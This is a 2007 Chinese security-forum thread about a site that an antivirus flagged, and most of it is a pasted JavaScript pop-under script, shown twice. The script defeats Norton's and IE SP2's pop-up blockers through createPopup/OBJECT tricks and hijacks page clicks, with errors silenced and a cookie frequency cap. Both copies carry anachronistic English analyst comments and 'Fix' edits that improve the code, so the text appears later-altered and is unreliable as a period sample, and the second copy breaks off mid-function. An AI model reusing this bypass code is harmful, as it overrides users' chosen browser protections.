
[病毒样本] 清风网络被挂马,红伞报警

Oceanzd
发表于 2007-1-16 04:51:33 | 显示全部楼层 |阅读模式
就是下面这个网址:

  1. www.vipcn.com


不过可能是弹出窗口带有木马,查看源代码没有什么发现

发现原来有个指向下面网址的链接,红伞报已知JS木马。
  1. www.ting88.com

提取了网页的源代码给大家看看
<script language="javascript">
// Pop-up target. paypopupURL1 is assigned but only referenced from commented-out
// code further down, so it is dead at runtime.
var paypopupURL = "http://www.ting88.com";
var paypopupURL1 = "http://www.ting88.com";
// Initial mode flag; version() below recomputes it from the user agent.
var usingActiveX = true;
// Global error handler: returning true from window.onerror tells the browser the
// error was handled, so nothing this script throws is ever surfaced to the user.
function blockError() {
  var handled = true;
  return handled;
}
// Swallow every runtime error raised by this script (see blockError).
window.onerror = blockError;
//bypass norton internet security popup blocker
// Analyst note: if a pop-up blocker has wrapped window.open and left the real
// function under one of these names, the wrapper is undone here. References to
// SymRealWinOpen / NS_ActualOpen are a useful detection string for this family
// of pop-up code.
if (window.SymRealWinOpen){window.open = SymRealWinOpen;}
if (window.NS_ActualOpen) {window.open = NS_ActualOpen;}
// The typeof guards keep an existing value if another copy of this script has
// already run on the page; `var` inside an if block is still hoisted to script
// scope, so the names exist either way.
if (typeof(usingClick) == 'undefined') {var usingClick = false;}
if (typeof(usingActiveX) == 'undefined') {var usingActiveX = false;}
if (typeof(popwin) == 'undefined') {var popwin = null;}
if (typeof(poped) == 'undefined') {var poped = false;}
//if (typeof(paypopupURL) == 'undefined') {var paypopupURL = "http://www.ting88.com/ad/bt.htm";}
// Master switch: version() ANDs every mode flag with blk, so 0 disables all paths.
var blk = 1;
var setupClickSuccess = false;  // document.onclick hijack installed (setupClick)
var googleInUse = false;        // selects the createPopup path over the iframe path
var myurl = location.href+'/';  // trimmed to the origin in openWindowBack()
var MAX_TRIED = 20;             // retry budget shared by tryActiveX/openActiveX
var activeXTried = false;       // set once the ActiveX path has succeeded or given up
var tried = 0;                  // polls made so far on the ActiveX path
// escape('0').substring(1) is the empty string, so the keyCode fired in
// openActiveX() is '' with this value; presumably a server-filled placeholder.
var randkey = '0';  // random key from server
var myWindow;   // the OBJECT's parentWindow obtained in tryActiveX()
var popWindow;  // window.createPopup() result from setupActiveX()
var setupActiveXSuccess = 0;  // 0-5: failed attempts so far, 6: scaffolding written
// bypass IE functions
// Analyst note: writes the hidden scaffolding for the ActiveX pop-up path.
// Because it uses document.write it only works while the page is still being
// parsed; it is reached from btpop() -> openWindowBack() at the end of this
// script. On any exception it re-schedules itself every 500 ms, up to five
// attempts, then marks the ActiveX path as tried and falls back to setupClick().
// What gets written:
//   - a hidden <INPUT ID="autoHit">, the target of the synthetic keypress that
//     openActiveX() fires;
//   - popWindow, an IE createPopup() window hosting an <OBJECT ID="getParentDiv">
//     that loads myurl + '/paypopup.html' (myurl is the hosting page's origin
//     after openWindowBack(), so the helper page comes from the infected site);
//   - a 1x1 off-screen <IFRAME NAME="popIframe"> hosting the same document as
//     <OBJECT ID="getParentFrame">. Note src="/about:blank" has a leading slash,
//     so it requests a path on the site rather than the about:blank pseudo-URL.
// tryActiveX() later takes the OBJECT's .object.parentWindow and showActiveX()
// calls open() on that window instead of on this document's window.
// paypopup.html itself is not on this page, so what it does cannot be told here.
function setupActiveX() {if (usingActiveX) {try{if (setupActiveXSuccess < 5) {document.write('<DIV STYLE="display:none;"><INPUT  ID="autoHit" TYPE="TEXT" ></DIV>');
popWindow=window.createPopup();
popWindow.document.body.innerHTML='<DIV ID="objectRemover"><OBJECT ID="getParentDiv" STYLE="position:absolute;top:0px;left:0px;" WIDTH=1 HEIGHT=1 DATA="'+myurl+'/paypopup.html" TYPE="text/html"></OBJECT></DIV>';
document.write('<IFRAME NAME="popIframe" STYLE="position:absolute;top:-100px;left:0px;width:1px;height:1px;" src="/about:blank"></IFRAME>');
popIframe.document.write('<OBJECT ID="getParentFrame" STYLE="position:absolute;top:0px;left:0px;" WIDTH=1 HEIGHT=1 DATA="'+myurl+'/paypopup.html" TYPE="text/html"></OBJECT>');
setupActiveXSuccess = 6;}}catch(e){if (setupActiveXSuccess < 5) {setupActiveXSuccess++;setTimeout('setupActiveX();',500);}else if (setupActiveXSuccess == 5) {activeXTried = true;setupClick();}}}}  // 6 = done; on error retry up to 5 times, then give up to click mode
// Analyst note: polls (every 200 ms via a string setTimeout) until the
// <OBJECT> written by setupActiveX() exposes .object.parentWindow, then stores
// that window in myWindow and hands off to openActiveX(). googleInUse picks the
// createPopup() copy (getParentDiv) over the iframe copy (getParentFrame).
// Shares the `tried` counter with openActiveX(); after MAX_TRIED polls it gives
// up and installs the click-mode fallback instead.
function tryActiveX(){
if (!activeXTried && !poped)
{
if (setupActiveXSuccess == 6 && googleInUse && popWindow && popWindow.document.getElementById('getParentDiv') && popWindow.document.getElementById('getParentDiv').object && popWindow.document.getElementById('getParentDiv').object.parentWindow)
{
myWindow=popWindow.document.getElementById('getParentDiv').object.parentWindow;
}
else if (setupActiveXSuccess == 6 && !googleInUse && popIframe && popIframe.getParentFrame && popIframe.getParentFrame.object && popIframe.getParentFrame.object.parentWindow)
{
myWindow=popIframe.getParentFrame.object.parentWindow;
// Navigate the helper iframe away once its window handle has been captured.
popIframe.location.replace('about:blank');
}
else
{setTimeout('tryActiveX()',200);
tried++;
if (tried >= MAX_TRIED && !activeXTried)
{
activeXTried = true;
setupClick();}return;
}
// openActiveX() runs before windowFired is set, so its first call only
// schedules a 100 ms retry; that retry then sees windowFired == true.
openActiveX();
window.windowFired=true;self.focus();
}
}

// Analyst note: once myWindow is available and windowFired is set, fires a
// synthetic onkeypress on the hidden 'autoHit' input with keyCode =
// escape(randkey).substring(1) (the empty string for the shipped randkey '0').
// Whatever reacts to that event is not in this script — presumably code in
// paypopup.html loaded by the OBJECT, which cannot be confirmed from here.
// Otherwise retries every 100 ms; `tried` is shared with tryActiveX() and after
// MAX_TRIED the function gives up and falls back to setupClick().
function openActiveX()
{
if (!activeXTried && !poped)
{
if (myWindow && window.windowFired)
{
window.windowFired=false;
document.getElementById('autoHit').fireEvent("onkeypress",(document.createEventObject().keyCode=escape(randkey).substring(1)));
}
else
{
setTimeout('openActiveX();',100);
}
tried++;
if (tried >= MAX_TRIED)
{activeXTried = true;setupClick();
}
}
}
// Analyst note: nothing in this script calls showActiveX(); presumably it is
// invoked from paypopup.html (not on this page) after the keypress fired by
// openActiveX(). It opens paypopupURL through myWindow.open — i.e. from the
// OBJECT's parent window rather than this document — under the fixed window
// name "abcdefg", then blurs the new window and refocuses this one (pop-under).
// When googleInUse is set the OBJECT is first detached from popWindow.
// newWindow is an implicit global (no var). On failure it retries the whole
// ActiveX path once with googleInUse=true and the counter reset, then falls
// back to click mode.
function showActiveX()
{
if (!activeXTried && !poped)
{
if (googleInUse) {
window.daChildObject=popWindow.document.getElementById('objectRemover').children(0);
window.daChildObject=popWindow.document.getElementById('objectRemover').removeChild(window.daChildObject);
}
newWindow=myWindow.open(paypopupURL, "abcdefg", "width=650,height=300,top=300,left=150,toolbar=yes,menubar=yes,scrollbars=yes,resizable=yes,location=yes,status=yes");
//newWindow=myWindow.open(paypopupURL1,'12345', "width=760,height=350,top=300,left=150");
if (newWindow) {newWindow.blur();self.focus();activeXTried = true;poped = true;}else {if (!googleInUse) {googleInUse=true;tried=0;tryActiveX();}else {activeXTried = true;setupClick();}}}}  // success: pop-under; first failure: retry via createPopup; second: click mode
// end bypass IE functions
// normal call functions
// Plain pop-up path: when neither click mode nor ActiveX mode is selected, calls
// window.open directly (window name "abcdefg", 650x300, all chrome enabled) and
// refocuses this window. If nothing opened (blocked), falls through to
// tryActiveX() or setupClick() depending on usingActiveX.
function paypopup(){if (!poped) {if(!usingClick && !usingActiveX) {
popwin = window.open(paypopupURL, "abcdefg", "width=650,height=300,top=300,left=150,toolbar=yes,menubar=yes,scrollbars=yes,resizable=yes,location=yes,status=yes");
//popwin1 = window.open(paypopupURL1,'12345', "width=760,height=350,top=300,left=150");
if (popwin) {poped = true;}self.focus();}}if (!poped) {if (usingActiveX) {tryActiveX();}else {setupClick();}}}  // fallback chain when the direct open was blocked
// end normal call functions
// onclick call functions
// Click mode: hijacks document.onclick so the pop-up opens on the user's next
// click anywhere in the page (pop-up blockers generally permit window.open from
// inside a user-initiated click handler, which is presumably the point).
// The previous handler is saved in the implicit global prePaypopOnclick and
// re-invoked by gopop(). document.captureEvents(Event.CLICK) is the legacy
// Netscape 4 event API. Runs once per page (setupClickSuccess).
function setupClick() {if (!poped && !setupClickSuccess){if (window.Event) document.captureEvents(Event.CLICK);prePaypopOnclick = document.onclick;document.onclick = gopop;self.focus();setupClickSuccess=true;}}
// document.onclick handler installed by setupClick(): opens the pop-up once,
// refocuses this window, then chains to the previously installed handler.
// Note the chained handler is called with no event argument and its return
// value is discarded, so a prior handler's `return false` no longer cancels
// the click.
function gopop() {
if (!poped)
{popwin = window.open(paypopupURL, "abcdefg", "width=650,height=300,top=300,left=150,toolbar=yes,menubar=yes,scrollbars=yes,resizable=yes,location=yes,status=yes");
if (popwin) {poped = true;}self.focus();}
if (typeof(prePaypopOnclick) == "function") {prePaypopOnclick();}}
// end onclick call functions
// check version
// Probes for a browser extension by writing an <OBJECT> with a fixed CLASSID
// (named after Google, presumably the Google Toolbar; not verifiable here) and
// ORs the result into googleInUse, which selects the createPopup path in
// tryActiveX/showActiveX. Two things to note: `|=` turns googleInUse into a
// number (0/1), and typeof(null) is also 'object', so the check is true whether
// or not getElementById finds the element — after a successful document.write
// googleInUse is therefore effectively always set. Retries every 50 ms on error.
function detectGoogle() {if (usingActiveX) {try {document.write('<DIV STYLE="display:none;"><OBJECT ID="detectGoogle" CLASSID="clsid:00EF2092-6AC5-47c0-BD25-CF2D5D657FEB" STYLE="display:none;" CODEBASE="view-source:about:blank"></OBJECT></DIV>');googleInUse|=(typeof(document.getElementById('detectGoogle'))=='object');}catch(e){setTimeout('detectGoogle();',50);}}}
// Picks the pop-up strategy from the user agent. os, bs and isframe are computed
// but never read, and `paypopupURL = paypopupURL` is a no-op. The flags that
// matter (each ANDed with the blk master switch):
//   usingClick   - "SV1" (the token Internet Explorer on Windows XP SP2 adds),
//                  Opera or Firefox
//   usingActiveX - "SV1" and MSIE/Microsoft and not Opera
// so an SP2 IE gets the ActiveX path first, other blocking browsers get click
// mode, and an older IE with neither token gets the plain window.open path.
// Ends by running detectGoogle().
function version() {
var os = 'W0';
var bs = 'I0';
var isframe = false;
var browser = window.navigator.userAgent;
if (browser.indexOf('Win') != -1) {os = 'W1';}
if (browser.indexOf("SV1") != -1) {bs = 'I2';}
else if (browser.indexOf("Opera") != -1) {bs = "I0";}
else if (browser.indexOf("Firefox") != -1) {bs = "I0";}
else if (browser.indexOf("Microsoft") != -1 || browser.indexOf("MSIE") != -1) {bs = 'I1';}
if (top.location != this.location) {isframe = true;}
paypopupURL = paypopupURL;
usingClick = blk && ((browser.indexOf("SV1") != -1) || (browser.indexOf("Opera") != -1) || (browser.indexOf("Firefox") != -1));usingActiveX = blk && (browser.indexOf("SV1") != -1) && !(browser.indexOf("Opera") != -1) && ((browser.indexOf("Microsoft") != -1) || (browser.indexOf("MSIE") != -1));detectGoogle();
}
version();  // runs at parse time, before btpop() below, so the mode flags are set when loadingPop() dispatches
// end check version
// Dispatches to the strategy chosen by version(): ActiveX first, then click
// mode, otherwise the plain window.open path.
function loadingPop() {
  if (usingActiveX) {
    tryActiveX();
  } else if (usingClick) {
    setupClick();
  } else {
    paypopup();
  }
}

//\\\\\\\\\\\\\\
// Looks up cookie `name` in document.cookie. Only a match at the start of a
// segment counts (offset 0, or immediately after a space), which is why the
// scan hops from space to space instead of calling indexOf on the whole string.
// Returns the unescaped value, or null when no such cookie exists.
function GetCookie (name) {
  var needle = name + "=";
  var needleLen = needle.length;
  var jar = document.cookie;
  var jarLen = jar.length;
  for (var pos = 0; pos < jarLen; ) {
    var valueStart = pos + needleLen;
    if (jar.substring(pos, valueStart) === needle) {
      return getCookieVal(valueStart);
    }
    var nextSpace = jar.indexOf(" ", pos);
    if (nextSpace === -1) {
      return null;
    }
    pos = nextSpace + 1;
  }
  return null;
}
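// Writes a cookie. Only name and value are declared; expires (a Date), path,
// domain and secure are optional positional extras read from `arguments`.
// value is escape()d — legacy encoding, kept because GetCookie/getCookieVal
// decode with unescape.
// Fix: the original read SetCookie.arguments, which throws a TypeError in
// strict-mode code (ES modules, 'use strict'); the plain `arguments` object is
// identical in sloppy mode and also works under strict mode.
function SetCookie (name, value) {
  var argc = arguments.length;
  var expires = (argc > 2) ? arguments[2] : null;
  var path = (argc > 3) ? arguments[3] : null;
  var domain = (argc > 4) ? arguments[4] : null;
  var secure = (argc > 5) ? arguments[5] : false;
  document.cookie = name + "=" + escape(value) +
    ((expires == null) ? "" : ("; expires=" + expires.toGMTString())) +
    ((path == null) ? "" : ("; path=" + path)) +
    ((domain == null) ? "" : ("; domain=" + domain)) +
    ((secure == true) ? "; secure" : "");
}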
// Expires cookie `name` immediately by rewriting it with an expiry one
// millisecond in the past; the stored value becomes 0.
function DeleteCookie (name) {
  var past = new Date(new Date().getTime() - 1);
  var cval = 0;
  document.cookie = name + "=" + cval + "; expires=" + past.toGMTString();
}
// Cookie lifetime; adjust to your situation. (Translated from the original.)
// Note: despite expDays = 1 the multiplier is 6*60*60*1000, i.e. the
// 'countsports' counter cookie lives six hours, not a day.
var expDays = 1;
var exp = new Date();
exp.setTime(exp.getTime() + (expDays*6*60*60*1000));
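// Frequency cap backed by the 'countsports' cookie (the original comment says
// "once per IP", but it is per browser cookie jar, so clearing that cookie
// re-arms the pop-up). First visit: writes "1" as a session cookie and returns
// 1, the only value btpop() acts on. Later visits: increments the stored count,
// rewrites it with the script-level `exp` expiry and returns the new count.
// Fix: parseInt now passes radix 10; without it, legacy engines parse a
// leading-zero value as octal. The original `if(newcount<2) count=1;` was dead
// (count was never read again) and is dropped.
function amt(){
  var count = GetCookie('countsports');
  if (count == null) {
    SetCookie('countsports', '1');
    return 1;
  }
  var newcount = parseInt(count, 10) + 1;
  SetCookie('countsports', newcount, exp);
  return newcount;
}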
// Returns the unescaped cookie value that starts at `offset` in
// document.cookie and runs to the next ';' (or the end of the string).
function getCookieVal(offset) {
  var jar = document.cookie;
  var end = jar.indexOf(";", offset);
  if (end < 0) {
    end = jar.length;
  }
  return unescape(jar.substring(offset, end));
}
// Entry point: fires the pop-up only when amt() reports the first visit
// (count 1). It also tries to queue "openWindowBack()" on aryADSeq, which is
// not defined anywhere in this script; when that throws, openWindowBack()
// simply runs a second time.
function btpop(){
  if (amt() != 1) {
    return;
  }
  openWindowBack();
  try {
    aryADSeq.push("openWindowBack()");
  } catch (e) {
    openWindowBack();
  }
}
// Trims myurl (location.href + '/') down to its origin — everything before the
// first '/' at or after index 8, i.e. past the scheme — falling back to '.'
// when no such slash exists, then writes the ActiveX scaffolding and dispatches.
function openWindowBack() {
  var originEnd = myurl.indexOf('/', 8);
  myurl = myurl.substring(0, originEnd);
  if (myurl === '') {
    myurl = '.';
  }
  setupActiveX();
  loadingPop();
}
btpop();  // kicks everything off at parse time (document.write in setupActiveX needs that)
//setTimeout('btpop();',5000); // alternative: delay 5 s (the original trailing comment was garbled)
</script>

[ 本帖最后由 jzhhh 于 2007-1-16 04:59 编辑 ]

曲中求
发表于 2007-1-16 07:59:13 | 显示全部楼层
俺用opera浏览时不报,但调用IE时NOD 32报了:

Oceanzd
 楼主| 发表于 2007-1-16 08:03:41 | 显示全部楼层

回复 #2 曲中求 的帖子

不是用红伞的吗?怎么又加了个NOD?
曲中求
发表于 2007-1-16 08:10:19 | 显示全部楼层

回复 #3 jzhhh 的帖子

红伞我这里升级好慢。。。。呵呵。。这个。。。这个。。。。
九尾野狐
发表于 2007-1-16 08:47:40 | 显示全部楼层
www.vipcn.com  未被挂马

www.ting88.com  也未带病毒

之所以报的原因是因为www.vipcn.com 使用了一个恶意弹窗代码,该代码可以突破SP2,实现每24小时弹窗一次。

代码如下:

// Pop-up target (redacted to xxx.com by the poster). paypopupURL1 is assigned
// but only referenced from commented-out code further down, so it is dead.
var paypopupURL = "http://www.xxx.com";
var paypopupURL1 = "http://www.xxx.com";

// Initial mode flag; version() below recomputes it from the user agent.
var usingActiveX = true;
// Global error handler: returning true from window.onerror tells the browser the
// error was handled, so nothing this script throws is ever surfaced to the user.
function blockError() {
  var handled = true;
  return handled;
}
// Swallow every runtime error raised by this script (see blockError).
window.onerror = blockError;
//bypass norton internet security popup blocker
// Analyst note: if a pop-up blocker has wrapped window.open and left the real
// function under one of these names, the wrapper is undone here. References to
// SymRealWinOpen / NS_ActualOpen are a useful detection string for this family
// of pop-up code.
if (window.SymRealWinOpen){window.open = SymRealWinOpen;}
if (window.NS_ActualOpen) {window.open = NS_ActualOpen;}
// The typeof guards keep an existing value if another copy of this script has
// already run on the page; `var` inside an if block is still hoisted to script
// scope, so the names exist either way.
if (typeof(usingClick) == 'undefined') {var usingClick = false;}
if (typeof(usingActiveX) == 'undefined') {var usingActiveX = false;}
if (typeof(popwin) == 'undefined') {var popwin = null;}
if (typeof(poped) == 'undefined') {var poped = false;}

// Master switch: version() ANDs every mode flag with blk, so 0 disables all paths.
var blk = 1;
var setupClickSuccess = false;  // document.onclick hijack installed (setupClick)
var googleInUse = false;        // selects the createPopup path over the iframe path
var myurl = location.href+'/';  // trimmed to the origin in openWindowBack()
var MAX_TRIED = 20;             // retry budget shared by tryActiveX/openActiveX
var activeXTried = false;       // set once the ActiveX path has succeeded or given up
var tried = 0;                  // polls made so far on the ActiveX path
// escape('0').substring(1) is the empty string, so the keyCode fired in
// openActiveX() is '' with this value; presumably a server-filled placeholder.
var randkey = '0'; // random key from server
var myWindow;   // the OBJECT's parentWindow obtained in tryActiveX()
var popWindow;  // window.createPopup() result from setupActiveX()
var setupActiveXSuccess = 0;  // 0-5: failed attempts so far, 6: scaffolding written
// bypass IE functions
// Analyst note: writes the hidden scaffolding for the ActiveX pop-up path.
// Because it uses document.write it only works while the page is still being
// parsed; it is reached from btpop() -> openWindowBack() at the end of this
// script. On any exception it re-schedules itself every 500 ms, up to five
// attempts, then marks the ActiveX path as tried and falls back to setupClick().
// What gets written:
//   - a hidden <INPUT ID="autoHit">, the target of the synthetic keypress that
//     openActiveX() fires;
//   - popWindow, an IE createPopup() window hosting an <OBJECT ID="getParentDiv">
//     that loads myurl + '/paypopup.html' (myurl is the hosting page's origin
//     after openWindowBack(), so the helper page comes from the infected site);
//   - a 1x1 off-screen <IFRAME NAME="popIframe"> hosting the same document as
//     <OBJECT ID="getParentFrame">. Note src="/about:blank" has a leading slash,
//     so it requests a path on the site rather than the about:blank pseudo-URL.
// tryActiveX() later takes the OBJECT's .object.parentWindow and showActiveX()
// calls open() on that window instead of on this document's window.
// paypopup.html itself is not on this page, so what it does cannot be told here.
function setupActiveX() {if (usingActiveX) {try{if (setupActiveXSuccess < 5) {document.write('<DIV STYLE="display:none;"><INPUT ID="autoHit" TYPE="TEXT" ></DIV>');
popWindow=window.createPopup();
popWindow.document.body.innerHTML='<DIV ID="objectRemover"><OBJECT ID="getParentDiv" STYLE="position:absolute;top:0px;left:0px;" WIDTH=1 HEIGHT=1 DATA="'+myurl+'/paypopup.html" TYPE="text/html"></OBJECT></DIV>';
document.write('<IFRAME NAME="popIframe" STYLE="position:absolute;top:-100px;left:0px;width:1px;height:1px;" src="/about:blank"></IFRAME>');
popIframe.document.write('<OBJECT ID="getParentFrame" STYLE="position:absolute;top:0px;left:0px;" WIDTH=1 HEIGHT=1 DATA="'+myurl+'/paypopup.html" TYPE="text/html"></OBJECT>');
setupActiveXSuccess = 6;}}catch(e){if (setupActiveXSuccess < 5) {setupActiveXSuccess++;setTimeout('setupActiveX();',500);}else if (setupActiveXSuccess == 5) {activeXTried = true;setupClick();}}}}  // 6 = done; on error retry up to 5 times, then give up to click mode

// Analyst note: polls (every 200 ms via a string setTimeout) until the
// <OBJECT> written by setupActiveX() exposes .object.parentWindow, then stores
// that window in myWindow and hands off to openActiveX(). googleInUse picks the
// createPopup() copy (getParentDiv) over the iframe copy (getParentFrame).
// Shares the `tried` counter with openActiveX(); after MAX_TRIED polls it gives
// up and installs the click-mode fallback instead.
function tryActiveX(){
if (!activeXTried && !poped)
{
if (setupActiveXSuccess == 6 && googleInUse && popWindow && popWindow.document.getElementById('getParentDiv') && popWindow.document.getElementById('getParentDiv').object && popWindow.document.getElementById('getParentDiv').object.parentWindow)
{
myWindow=popWindow.document.getElementById('getParentDiv').object.parentWindow;
}
else if (setupActiveXSuccess == 6 && !googleInUse && popIframe && popIframe.getParentFrame && popIframe.getParentFrame.object && popIframe.getParentFrame.object.parentWindow)
{
myWindow=popIframe.getParentFrame.object.parentWindow;
// Navigate the helper iframe away once its window handle has been captured.
popIframe.location.replace('about:blank');
}
else
{setTimeout('tryActiveX()',200);
tried++;
if (tried >= MAX_TRIED && !activeXTried)
{
activeXTried = true;
setupClick();}return;
}
// openActiveX() runs before windowFired is set, so its first call only
// schedules a 100 ms retry; that retry then sees windowFired == true.
openActiveX();
window.windowFired=true;self.focus();
}
}

// Analyst note: once myWindow is available and windowFired is set, fires a
// synthetic onkeypress on the hidden 'autoHit' input with keyCode =
// escape(randkey).substring(1) (the empty string for the shipped randkey '0').
// Whatever reacts to that event is not in this script — presumably code in
// paypopup.html loaded by the OBJECT, which cannot be confirmed from here.
// Otherwise retries every 100 ms; `tried` is shared with tryActiveX() and after
// MAX_TRIED the function gives up and falls back to setupClick().
function openActiveX()
{
if (!activeXTried && !poped)
{
if (myWindow && window.windowFired)
{
window.windowFired=false;
document.getElementById('autoHit').fireEvent("onkeypress",(document.createEventObject().keyCode=escape(randkey).substring(1)));
}
else
{
setTimeout('openActiveX();',100);
}
tried++;
if (tried >= MAX_TRIED)
{activeXTried = true;setupClick();
}
}
}

// Analyst note: nothing in this script calls showActiveX(); presumably it is
// invoked from paypopup.html (not on this page) after the keypress fired by
// openActiveX(). It opens paypopupURL through myWindow.open — i.e. from the
// OBJECT's parent window rather than this document — under the fixed window
// name "abcdefg", then blurs the new window and refocuses this one (pop-under).
// When googleInUse is set the OBJECT is first detached from popWindow.
// newWindow is an implicit global (no var). On failure it retries the whole
// ActiveX path once with googleInUse=true and the counter reset, then falls
// back to click mode.
function showActiveX()
{
if (!activeXTried && !poped)
{
if (googleInUse) {
window.daChildObject=popWindow.document.getElementById('objectRemover').children(0);
window.daChildObject=popWindow.document.getElementById('objectRemover').removeChild(window.daChildObject);
}
newWindow=myWindow.open(paypopupURL, "abcdefg", "width=650,height=300,top=300,left=150,toolbar=yes,menubar=yes,scrollbars=yes,resizable=yes,location=yes,status=yes");
//newWindow=myWindow.open(paypopupURL1,'12345', "width=760,height=350,top=300,left=150");

if (newWindow) {newWindow.blur();self.focus();activeXTried = true;poped = true;}else {if (!googleInUse) {googleInUse=true;tried=0;tryActiveX();}else {activeXTried = true;setupClick();}}}}  // success: pop-under; first failure: retry via createPopup; second: click mode
// end bypass IE functions
// normal call functions

// Plain pop-up path: when neither click mode nor ActiveX mode is selected, calls
// window.open directly (window name "abcdefg", 650x300, all chrome enabled) and
// refocuses this window. If nothing opened (blocked), falls through to
// tryActiveX() or setupClick() depending on usingActiveX.
function paypopup(){if (!poped) {if(!usingClick && !usingActiveX) {
popwin = window.open(paypopupURL, "abcdefg", "width=650,height=300,top=300,left=150,toolbar=yes,menubar=yes,scrollbars=yes,resizable=yes,location=yes,status=yes");
//popwin1 = window.open(paypopupURL1,'12345', "width=760,height=350,top=300,left=150");
if (popwin) {poped = true;}self.focus();}}if (!poped) {if (usingActiveX) {tryActiveX();}else {setupClick();}}}  // fallback chain when the direct open was blocked
// end normal call functions
// onclick call functions

// Click mode: hijacks document.onclick so the pop-up opens on the user's next
// click anywhere in the page (pop-up blockers generally permit window.open from
// inside a user-initiated click handler, which is presumably the point).
// The previous handler is saved in the implicit global prePaypopOnclick and
// re-invoked by gopop(). document.captureEvents(Event.CLICK) is the legacy
// Netscape 4 event API. Runs once per page (setupClickSuccess).
function setupClick() {if (!poped && !setupClickSuccess){if (window.Event) document.captureEvents(Event.CLICK);prePaypopOnclick = document.onclick;document.onclick = gopop;self.focus();setupClickSuccess=true;}}

// document.onclick handler installed by setupClick(): opens the pop-up once,
// refocuses this window, then chains to the previously installed handler.
// Note the chained handler is called with no event argument and its return
// value is discarded, so a prior handler's `return false` no longer cancels
// the click.
function gopop() {
if (!poped)
{popwin = window.open(paypopupURL, "abcdefg", "width=650,height=300,top=300,left=150,toolbar=yes,menubar=yes,scrollbars=yes,resizable=yes,location=yes,status=yes");

if (popwin) {poped = true;}self.focus();}
if (typeof(prePaypopOnclick) == "function") {prePaypopOnclick();}}
// end onclick call functions
// check version
// Probes for a browser extension by writing an <OBJECT> with a fixed CLASSID
// (named after Google, presumably the Google Toolbar; not verifiable here) and
// ORs the result into googleInUse, which selects the createPopup path in
// tryActiveX/showActiveX. Two things to note: `|=` turns googleInUse into a
// number (0/1), and typeof(null) is also 'object', so the check is true whether
// or not getElementById finds the element — after a successful document.write
// googleInUse is therefore effectively always set. Retries every 50 ms on error.
function detectGoogle() {if (usingActiveX) {try {document.write('<DIV STYLE="display:none;"><OBJECT ID="detectGoogle" CLASSID="clsid:00EF2092-6AC5-47c0-BD25-CF2D5D657FEB" STYLE="display:none;" CODEBASE="view-source:about:blank"></OBJECT></DIV>');googleInUse|=(typeof(document.getElementById('detectGoogle'))=='object');}catch(e){setTimeout('detectGoogle();',50);}}}

// Picks the pop-up strategy from the user agent. os, bs and isframe are computed
// but never read, and `paypopupURL = paypopupURL` is a no-op. The flags that
// matter (each ANDed with the blk master switch):
//   usingClick   - "SV1" (the token Internet Explorer on Windows XP SP2 adds),
//                  Opera or Firefox
//   usingActiveX - "SV1" and MSIE/Microsoft and not Opera
// so an SP2 IE gets the ActiveX path first, other blocking browsers get click
// mode, and an older IE with neither token gets the plain window.open path.
// Ends by running detectGoogle().
function version() {
var os = 'W0';
var bs = 'I0';
var isframe = false;
var browser = window.navigator.userAgent;
if (browser.indexOf('Win') != -1) {os = 'W1';}
if (browser.indexOf("SV1") != -1) {bs = 'I2';}
else if (browser.indexOf("Opera") != -1) {bs = "I0";}
else if (browser.indexOf("Firefox") != -1) {bs = "I0";}
else if (browser.indexOf("Microsoft") != -1 || browser.indexOf("MSIE") != -1) {bs = 'I1';}
if (top.location != this.location) {isframe = true;}
paypopupURL = paypopupURL;
usingClick = blk && ((browser.indexOf("SV1") != -1) || (browser.indexOf("Opera") != -1) || (browser.indexOf("Firefox") != -1));usingActiveX = blk && (browser.indexOf("SV1") != -1) && !(browser.indexOf("Opera") != -1) && ((browser.indexOf("Microsoft") != -1) || (browser.indexOf("MSIE") != -1));detectGoogle();
}

version();  // runs at parse time, before btpop() below, so the mode flags are set when loadingPop() dispatches

// end check version
// Dispatches to the strategy chosen by version(): ActiveX first, then click
// mode, otherwise the plain window.open path.
function loadingPop() {
  if (usingActiveX) {
    tryActiveX();
  } else if (usingClick) {
    setupClick();
  } else {
    paypopup();
  }
}

//\\\\\\\\\\\\\\
// Looks up cookie `name` in document.cookie. Only a match at the start of a
// segment counts (offset 0, or immediately after a space), which is why the
// scan hops from space to space instead of calling indexOf on the whole string.
// Returns the unescaped value, or null when no such cookie exists.
function GetCookie (name) {
  var needle = name + "=";
  var needleLen = needle.length;
  var jar = document.cookie;
  var jarLen = jar.length;
  for (var pos = 0; pos < jarLen; ) {
    var valueStart = pos + needleLen;
    if (jar.substring(pos, valueStart) === needle) {
      return getCookieVal(valueStart);
    }
    var nextSpace = jar.indexOf(" ", pos);
    if (nextSpace === -1) {
      return null;
    }
    pos = nextSpace + 1;
  }
  return null;
}
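// Writes a cookie. Only name and value are declared; expires (a Date), path,
// domain and secure are optional positional extras read from `arguments`.
// value is escape()d — legacy encoding, kept because GetCookie/getCookieVal
// decode with unescape.
// Fix: the original read SetCookie.arguments, which throws a TypeError in
// strict-mode code (ES modules, 'use strict'); the plain `arguments` object is
// identical in sloppy mode and also works under strict mode.
function SetCookie (name, value) {
  var argc = arguments.length;
  var expires = (argc > 2) ? arguments[2] : null;
  var path = (argc > 3) ? arguments[3] : null;
  var domain = (argc > 4) ? arguments[4] : null;
  var secure = (argc > 5) ? arguments[5] : false;
  document.cookie = name + "=" + escape(value) +
    ((expires == null) ? "" : ("; expires=" + expires.toGMTString())) +
    ((path == null) ? "" : ("; path=" + path)) +
    ((domain == null) ? "" : ("; domain=" + domain)) +
    ((secure == true) ? "; secure" : "");
}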
// Expires cookie `name` immediately by rewriting it with an expiry one
// millisecond in the past; the stored value becomes 0.
function DeleteCookie (name) {
  var past = new Date(new Date().getTime() - 1);
  var cval = 0;
  document.cookie = name + "=" + cval + "; expires=" + past.toGMTString();
}
// Cookie lifetime; adjust to your situation. (Translated from the original.)
// Note: despite expDays = 1 the multiplier is 6*60*60*1000, i.e. the
// 'countsports' counter cookie lives six hours, not the 24 hours the reply
// above describes.
var expDays = 1;
var exp = new Date();
exp.setTime(exp.getTime() + (expDays*6*60*60*1000));
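// Frequency cap backed by the 'countsports' cookie (the original comment says
// "once per IP", but it is per browser cookie jar, so clearing that cookie
// re-arms the pop-up). First visit: writes "1" as a session cookie and returns
// 1, the only value btpop() acts on. Later visits: increments the stored count,
// rewrites it with the script-level `exp` expiry and returns the new count.
// Fix: parseInt now passes radix 10; without it, legacy engines parse a
// leading-zero value as octal. The original `if(newcount<2) count=1;` was dead
// (count was never read again) and is dropped.
function amt(){
  var count = GetCookie('countsports');
  if (count == null) {
    SetCookie('countsports', '1');
    return 1;
  }
  var newcount = parseInt(count, 10) + 1;
  SetCookie('countsports', newcount, exp);
  return newcount;
}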
// Returns the unescaped cookie value that starts at `offset` in
